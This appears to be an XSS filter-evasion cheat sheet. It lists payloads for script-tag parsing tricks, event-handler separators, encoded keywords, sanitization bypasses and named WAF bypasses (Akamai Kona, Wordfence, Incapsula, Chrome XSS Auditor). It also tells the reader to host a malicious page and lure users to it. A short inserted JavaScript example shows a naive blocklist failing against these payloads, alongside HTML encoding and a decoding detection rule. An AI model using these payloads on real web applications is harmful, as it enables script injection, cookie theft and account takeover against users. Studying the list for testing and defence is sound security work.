Filter Evasion
Common Techniques
Script tag
Weak tag parsing bypass
<ScRiPt>...</sCrIpT>
<ScRiPt>... #unclosed tags
<script/[gibberish]>...</script>
<script [\n\r\t]>...</script>
<script [\x00 \x0D \x0A]>... </script [\x00 \x0D \x0A]>
<scr<script>ipt>...</scr<script>ipt>
Common alternative tags
Require user interaction
<a href="javascript:[code]">show</a>
<a href="data:text/html;base64,[base64 payload]">show</a>
<form action="javascript:[code]"><button>Click me</button></form>
<form id="f1"></form><button form="f1" formaction="javascript:[code]">Click me</button>
<object data="javascript:[code]">
<object data="text/html:<script>[code]</script>">
<object data="data:text/html;base64,[base64 payload]">
EvilCos
Can be downloaded here.
Host the page on a site that you control and trick a user into navigating to it or triggering an HTTP request to the malicious URL.
<object data="[evil site]/xss.wfs">
<object data="[evil site]/xss.wfs" allowscriptaccess="always">
Events
Common HTML 4
<body onload="[code]">
<input type="image" src="x" onerror="[code]">
<isindex onmouseover="[code]">
<form oninput="[code]"><input></form>
<textarea autofocus onfocus="[code]">
<input oncut="[code]">
Common HTML 5
<svg onload="[code]">
<keygen autofocus onfocus="[code]">
<video><source onerror="[code]">
<marquee onstart="[code]">
Filter Bypass
Bypass filters that match every word starting with "on" by exploiting the leniency of browser attribute parsing (separators other than whitespace are accepted before the event name)
<svg/onload=...>
<svg///////onload=...>
<svg id="x";onload=...>
<svg id=x;onload=...>
<svg id=`x`onload=...>
Bypass filters by exploiting control characters that the \s regex class does not match
<svg onload%09=...>
<svg %09onload=...>
<svg %09onload%20=...>
<svg onload%09%20%28%2c%3b=...>
<svg onload%0b=...>
List of control characters, by browser, that are commonly accepted after the equal sign or just before the event name and can be used to evade filters
%09 %0b %0c %20 %3b #Internet Explorer
%09 %20 %28 %2c %3b #Google Chrome
%2c %3b #Safari
%09 %20 %28 %2c %3b #Firefox
%09 %20 %2c %3b #Opera
%09 %20 %28 %2c %3b #Android
Keywords
Some filters try to detect common words used in XSS attacks such as alert, document, xhr, cookie, etc.
Bypass by encoding
URL encoding, Unicode escapes and CSS escapes can be used directly inside HTML pages without needing native tools. These techniques can be combined with each other to form even more complex payloads.
alert
\u0061lert
alert
alert
#the encoding formats below require the input to be in a string
eval('\141lert')
eval('\x61lert')
#useless escape characters
eval('\a\l\e\rt(\1\)')
Bypass by constructing strings
alert
/ale/.source+/rt/.source
String.fromCharCode(97,108,101,114,116) #Decimal character codes
atob("YWxlcnQ=") #Base64 payload
17795081..toString(36) #Convert the number on the left to a base36 string
Alternative function sinks
setTimeout
setInterval
Function
[].constructor.constructor("[code]")
Sanitization Bypass
Remove tags
<scr<script>ipt>...</script> #the filter might remove only the first instance
<scr<iframe>ipt>...</script> #iterative filters might not restart from the beginning of the string after each pass
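Why the blocklists described in the Filter Bypass and Remove tags entries fail, and what holds instead. This is an added example, not code from the original page: a naive blocklist of the kind the text describes is run against the page's own payloads, next to contextual output encoding and a detection heuristic that percent-decodes before matching. Node.js, no dependencies; the payload list is constructed from the page's entries.

```javascript
// Added example (not from the original page): a blocklist of the kind the page
// describes, run against the page's own payloads, next to the mitigation that
// actually holds (contextual output encoding). Node.js, no dependencies.

// Naive blocklist: strips the literal <script> tag and " onxxx=" handlers.
// One pass, no decoding, and it only recognises whitespace before "on".
function naiveBlocklistFilter(input) {
  return input
    .replace(/<script>/gi, '')          // single pass: <scr<script>ipt> survives
    .replace(/\son[a-z]+\s*=/gi, '');   // misses /onload=, ;onload=, %09onload=
}

// True when something the blocklist was meant to remove is still present.
function survivesNaiveFilter(payload) {
  return /onload|<script>/i.test(naiveBlocklistFilter(payload));
}

// Mitigation: encode characters that mean something to the HTML parser before
// placing untrusted data in an HTML text or quoted-attribute context.
function htmlEncode(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return input.replace(/[&<>"'\/]/g, (c) => map[c]);
}

function isInertAfterEncoding(payload) {
  return !/[<>"']/.test(htmlEncode(payload));
}

// Detection (WAF rule / log review): percent-decode first, then accept every
// separator the page lists before the event name (whitespace, / ; , ( `) and
// control characters between the name and '='. Still a heuristic, so it
// complements encoding rather than replacing it.
function looksLikeEventHandlerInjection(input) {
  let decoded = input;
  try { decoded = decodeURIComponent(input); } catch (_) { /* malformed %, keep raw */ }
  return /<[a-z][^>]*?[\s\/;,(`]on[a-z]+[\s\x00-\x1f]*=/i.test(decoded);
}

// Constructed inputs, copied from the page's Filter Bypass and Remove tags entries.
const SAMPLE_PAYLOADS = [
  '<svg/onload=alert(1)>',
  '<svg///////onload=alert(1)>',
  '<svg id=x;onload=alert(1)>',
  '<svg %09onload=alert(1)>',
  '<svg onload%09=alert(1)>',
  '<scr<script>ipt>alert(1)</script>',
];
```

Every sample passes the naive filter untouched, every sample is inert once HTML-encoded, and the plain form `<body onload=...>` is the only shape the blocklist actually catches.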
Escape quotes
eval(\'...\') #the filter replaces ' with \' so by adding \ we obtain \' --> \\'
String.fromCharCode(...) #generate string from sequence of unicode hex chars
unescape(/%78%u0073%73/.source) #decode escaped characters
decodeURI(/alert(%22...%22)/.source) #decode URL escaped chars
decodeURIComponent(/alert(%22...%22)/.source) #decode URL escaped chars
Escape parenthesis
By setting window.onerror to eval and using the throw statement, the parentheses can be placed inside a string literal and therefore encoded. Since the payload is in a string, all the obfuscation techniques described in the Keywords section can be used.
<img src=x onerror="window.onerror=eval;throw='alert\x28\x29'">
WAF Bypass
Google Chrome Payloads
Chrome XSS Auditor Bypass
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
Chrome < v60 beta XSS-Auditor Bypass
<script src="data:,alert(1)%250A-->
Other XSS Auditor Bypass Payloads
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
Safari
<script>location.href;'javascript:alert%281%29'</script>
Kona WAF (Akamai) Bypass
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
Wordfence
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Incapsula WAF
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>